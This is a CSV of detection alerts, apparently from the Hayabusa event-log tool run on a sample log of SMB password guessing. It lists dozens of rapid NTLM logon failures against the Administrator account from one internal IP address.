2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
